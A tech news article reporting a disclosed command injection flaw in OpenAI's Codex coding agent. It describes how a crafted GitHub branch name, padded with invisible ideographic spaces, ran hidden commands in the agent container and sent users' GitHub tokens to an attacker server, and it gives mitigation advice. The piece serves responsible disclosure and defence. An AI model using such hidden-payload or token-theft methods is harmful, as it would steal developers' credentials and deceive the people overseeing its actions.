- A carefully crafted branch name can steal your GitHub auth token
- Unicode spaces hide malicious payloads from human eyes
- Attackers can automate token theft between multiple users sharing a repository
Security researchers discovered a command injection vulnerability in OpenAI’s Codex cloud environment that allowed attackers to steal GitHub authentication tokens using nothing more than a carefully crafted branch name.
Research by BeyondTrust Phantom Labs found that the vulnerability stemmed from improper input checking in the way Codex handled GitHub branch names when running tasks.
By injecting arbitrary commands via the branch name parameter, an attacker could execute malicious payloads in the agent container and retrieve sensitive authentication tokens that grant access to connected GitHub repositories.
Article continues below
A vulnerability in plain sight
What makes this attack particularly concerning is the method researchers developed to hide the malicious payload from human detection.
The team identified a way to hide the payload using ideographic space, a Unicode character designated U+3000.
By adding 94 ideographic spaces followed by “or true” to the branch name, error conditions can be bypassed while still making the malicious part invisible in the Codex UI.
Ideographic spaces are ignored by Bash when executing the command, but they effectively hide the attack from any user who might see the branch name through the web portal.
The attack could be automated to compromise multiple users interacting with a shared GitHub repository.
With the proper repository permissions, an attacker could create a new branch containing the hidden payload and even set that branch as the default branch of the repository.
Any user who then interacted with this branch via Codex would have their GitHub OAuth token exfiltrated to an external server controlled by the attacker.
The researchers tested this technique by hosting a simple HTTP server on Amazon EC2 to monitor incoming requests, confirming that the stolen tokens were successfully transmitted.
The vulnerability affected multiple Codex interfaces, including the ChatGPT website, Codex CLI, Codex SDK, and Codex IDE extension.
Phantom Labs also discovered that authentication tokens stored locally on developers’ machines in the auth.json file could be leveraged to replicate the attack via backend APIs.
Beyond just stealing tokens, the same technique could steal GitHub installation access tokens by referencing the Codex in a pull request comment, thereby triggering a code review container that executed the payload.
All reported issues have since been resolved in coordination with the OpenAI security team.
However, this finding raises concerns about how AI coding agents will operate with privileged access.
Traditional security tools like antivirus and firewalls cannot prevent this attack because it occurs in OpenAI’s cloud environment, beyond their visibility.
To stay secure, organizations should audit the permissions of AI tools, especially agents, and enforce least privilege.
They should also monitor repositories for unusual branch names containing Unicode spaces, regularly rotate GitHub tokens, and examine access logs for suspicious API activity.
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.




